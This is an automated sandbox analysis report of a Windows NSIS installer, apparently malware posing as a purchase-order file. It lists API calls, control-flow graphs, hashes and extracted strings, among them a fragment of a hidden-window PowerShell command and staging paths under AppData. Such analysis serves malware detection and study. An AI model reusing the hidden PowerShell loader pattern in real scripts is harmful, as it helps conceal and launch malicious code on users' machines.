                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Podning Setup,NSIS Error), ref: 0040605D
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten$C:\Windows\resources\uncriticizables.dll
                                                                                              • API String ID: 1941528284-3164209308
                                                                                              • Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                              • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                              • Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
                                                                                              • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 620 4051af-4051c4 621 4051ca-4051db 620->621 622 40527b-40527f 620->622 623 4051e6-4051f2 lstrlenW 621->623 624 4051dd-4051e1 call 406072 621->624 626 4051f4-405204 lstrlenW 623->626 627 40520f-405213 623->627 624->623 626->622 628 405206-40520a lstrcatW 626->628 629 405222-405226 627->629 630 405215-40521c SetWindowTextW 627->630 628->627 631 405228-40526a SendMessageW * 3 629->631 632 40526c-40526e 629->632 630->629 631->632 632->622 633 405270-405273 632->633 633->622
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                              • lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                              • lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID: Completed
                                                                                              • API String ID: 2531174081-3087654605
                                                                                              • Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                              • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                              • Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                              • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 634 403027-40303e 635 403040 634->635 636 403047-403050 634->636 635->636 637 403052 636->637 638 403059-40305e 636->638 637->638 639 403060-403069 call 403258 638->639 640 40306e-40307b call 403242 638->640 639->640 644 403230 640->644 645 403081-403085 640->645 646 403232-403233 644->646 647 4031db-4031dd 645->647 648 40308b-4030d4 GetTickCount 645->648 651 40323b-40323f 646->651 649 40321d-403220 647->649 650 4031df-4031e2 647->650 652 403238 648->652 653 4030da-4030e2 648->653 657 403222 649->657 658 403225-40322e call 403242 649->658 650->652 654 4031e4 650->654 652->651 655 4030e4 653->655 656 4030e7-4030f5 call 403242 653->656 660 4031e7-4031ed 654->660 655->656 656->644 668 4030fb-403104 656->668 657->658 658->644 666 403235 658->666 663 4031f1-4031ff call 403242 660->663 664 4031ef 660->664 663->644 671 403201-40320d call 405cd7 663->671 664->663 666->652 670 40310a-40312a call 406549 668->670 676 403130-403143 GetTickCount 670->676 677 4031d3-4031d5 670->677 678 4031d7-4031d9 671->678 679 40320f-403219 671->679 680 403145-40314d 676->680 681 40318e-403190 676->681 677->646 678->646 679->660 684 40321b 679->684 685 403155-403186 MulDiv wsprintfW call 4051af 680->685 686 40314f-403153 680->686 682 403192-403196 681->682 683 4031c7-4031cb 681->683 688 403198-40319f call 405cd7 682->688 689 4031ad-4031b8 682->689 683->653 690 4031d1 683->690 684->652 691 40318b 685->691 686->681 686->685 694 4031a4-4031a6 688->694 693 4031bb-4031bf 689->693 690->652 691->681 693->670 695 4031c5 693->695 694->678 696 4031a8-4031ab 694->696 695->652 696->693
                                                                                              APIs
                                                                                              Strings
                                                                                              • ... %d%%, xrefs: 0040316E
                                                                                              • cyclical canakin flebotomy subcandidness intervalhalveringernes noncelebration dicaryon compsothlypidae gastritissenjasigerens quadroons rubinens stemmeberettiget glimrede udkoksede,farvellets mesenteriolum statsskove gennemsgningerne frtidspensionisters inv, xrefs: 004030AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$wsprintf
                                                                                              • String ID: ... %d%%$cyclical canakin flebotomy subcandidness intervalhalveringernes noncelebration dicaryon compsothlypidae gastritissenjasigerens quadroons rubinens stemmeberettiget glimrede udkoksede,farvellets mesenteriolum statsskove gennemsgningerne frtidspensionisters inv
                                                                                              • API String ID: 551687249-3985824943
                                                                                              • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                              • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                              • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                              • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 697 4063ba-4063da GetSystemDirectoryW 698 4063dc 697->698 699 4063de-4063e0 697->699 698->699 700 4063f1-4063f3 699->700 701 4063e2-4063eb 699->701 703 4063f4-406427 wsprintfW LoadLibraryExW 700->703 701->700 702 4063ed-4063ef 701->702 702->703
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                              • wsprintfW.USER32 ref: 0040640C
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                              • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                              • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                              • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 704 405c54-405c60 705 405c61-405c95 GetTickCount GetTempFileNameW 704->705 706 405ca4-405ca6 705->706 707 405c97-405c99 705->707 709 405c9e-405ca1 706->709 707->705 708 405c9b 707->708 708->709
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405C72
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 00405C54
                                                                                              • nsa, xrefs: 00405C61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-502685712
                                                                                              • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                              • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                              • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                              • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 710 401fc3-401fcf 711 401fd5-401feb call 402bbf * 2 710->711 712 40208e-402090 710->712 723 401ffb-40200a LoadLibraryExW 711->723 724 401fed-401ff9 GetModuleHandleW 711->724 713 4021dc-4021e1 call 401423 712->713 719 402a4c-402a5b 713->719 720 40281e-402825 713->720 720->719 725 402087-402089 723->725 726 40200c-40201b call 406499 723->726 724->723 724->726 725->713 730 402056-40205b call 4051af 726->730 731 40201d-402023 726->731 736 402060-402063 730->736 732 402025-402031 call 401423 731->732 733 40203c-402054 731->733 732->736 744 402033-40203a 732->744 733->736 736->719 737 402069-402073 call 403839 736->737 737->719 743 402079-402082 FreeLibrary 737->743 743->719 744->736
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                              • String ID: `OC
                                                                                              • API String ID: 334405425-799166930
                                                                                              • Opcode ID: 8e94686a10659349c404390c89b8fa7d2236a9bf12bd9f6309b2655a234b5092
                                                                                              • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                              • Opcode Fuzzy Hash: 8e94686a10659349c404390c89b8fa7d2236a9bf12bd9f6309b2655a234b5092
                                                                                              • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                                              • RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: : Completed
                                                                                              • API String ID: 3677997916-2954849223
                                                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                              • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                              • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                              • lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1356686001-0
                                                                                              • Opcode ID: e2698b925e538eb08bc3287f57d952c30838c56ac3af43e8d22cca89afe3aac8
                                                                                              • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                              • Opcode Fuzzy Hash: e2698b925e538eb08bc3287f57d952c30838c56ac3af43e8d22cca89afe3aac8
                                                                                              • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 3585118688-0
                                                                                              • Opcode ID: c1ff62ea5870f37ba207307ce747ee3e83c7963594fadc4a02c24a9320e89dea
                                                                                              • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                              • Opcode Fuzzy Hash: c1ff62ea5870f37ba207307ce747ee3e83c7963594fadc4a02c24a9320e89dea
                                                                                              • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                • Part of subcall function 0040567E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten,?,00000000,000000F0), ref: 00401645
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten, xrefs: 00401638
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten
                                                                                              • API String ID: 1892508949-4006481345
                                                                                              • Opcode ID: 6dc6f43c6429ba2a5110b6159588fbb8671d59da53183db0781c9cb694e3a690
                                                                                              • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                              • Opcode Fuzzy Hash: 6dc6f43c6429ba2a5110b6159588fbb8671d59da53183db0781c9cb694e3a690
                                                                                              • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405743
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
